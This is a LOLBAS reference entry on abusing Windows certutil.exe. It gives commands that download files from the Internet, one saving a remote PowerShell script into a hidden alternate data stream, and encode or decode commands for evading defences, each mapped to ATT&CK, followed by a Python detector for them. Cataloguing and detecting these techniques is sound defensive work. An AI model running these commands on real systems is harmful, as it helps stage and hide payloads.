Certutil | LOLBAS

Windows binary used for handling certificates

Paths:

Resources:

Acknowledgements:

Detections:

Download

  1. Download and save 7zip to disk in the current folder.

    certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe

    Use case: Download file from Internet
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1105
  2. Download and save 7zip to disk in the current folder.

    certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe

    Use case: Download file from Internet
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1105

Alternate data streams

  1. Download and save a PS1 file to an Alternate Data Stream (ADS).

    certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

    Use case: Download file from Internet and save it in an NTFS Alternate Data Stream
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1564.004

Encode

  1. Command to encode a file using Base64.

    certutil -encode inputFileName encodedOutputFileName

    Use case: Encode files to evade defensive measures
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1027.013

Decode

  1. Command to decode a Base64 encoded file.

    certutil -decode encodedInputFileName decodedOutputFileName

    Use case: Decode files to evade defensive measures
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1140
  2. Command to decode a hexadecimal-encoded file.

    certutil -decodehex encoded_hexadecimal_InputFileName decodedOutputFileName

    Use case: Decode files to evade defensive measures
    Privileges required: User
    Operating systems: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    ATT&CK® technique: T1140
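
A defender-side check for the command lines listed on this page, as an added example that is not part of the LOLBAS entry: it tags process-creation command lines with the ATT&CK technique IDs given above. The function names, the regular expressions and the last two sample lines are assumptions of this example.

```python
import re

# certutil verb -> ATT&CK technique ID, as listed in the entries on this page.
VERBS = {"urlcache": "T1105", "verifyctl": "T1105", "encode": "T1027.013",
         "decode": "T1140", "decodehex": "T1140"}
URL_RE = re.compile(r"^https?://", re.I)
# "file:stream" target: a colon that is not the drive-letter colon (NTFS ADS).
ADS_RE = re.compile(r"^(?:[a-z]:)?[^:]{2,}:[^:\\/]+$", re.I)


def classify(cmdline):
    """Return the sorted ATT&CK IDs that a process command line matches."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    if not tokens:
        return []
    image = re.split(r"[\\/]", tokens[0])[-1].lower()
    if image not in ("certutil", "certutil.exe"):
        return []
    is_flag = lambda a: len(a) > 1 and a[0] in "-/"
    # certutil accepts "-verb" and "/verb" in any letter case.
    flags = {a[1:].lower() for a in tokens[1:] if is_flag(a)}
    values = [a for a in tokens[1:] if not is_flag(a)]
    hits = {VERBS[f] for f in flags if f in VERBS}
    if flags & {"urlcache", "verifyctl"}:
        if not any(URL_RE.match(v) for v in values):
            hits.discard("T1105")      # no URL argument: not a download
        elif any(ADS_RE.match(v) for v in values if not URL_RE.match(v)):
            hits.add("T1564.004")      # download written into an ADS
    return sorted(hits)


# Sample input: the first two lines reuse commands from this page,
# the last two are constructed for this example.
SAMPLES = [
    r"certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe",
    r"certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt",
    r'"C:\Windows\System32\CertUtil.exe" /DecodeHex in.hex out.bin',
    r"certutil -hashfile C:\temp\report.docx SHA256",   # benign, no match
]


def scan(lines=SAMPLES):
    """Return (command line, technique IDs) for every line that matches."""
    return [(line, classify(line)) for line in lines if classify(line)]


if __name__ == "__main__":
    for line, ids in scan():
        print(", ".join(ids), "<-", line)
```

Command-line matching misses a renamed copy of the binary, so pair it with the original file name field where the process telemetry provides one.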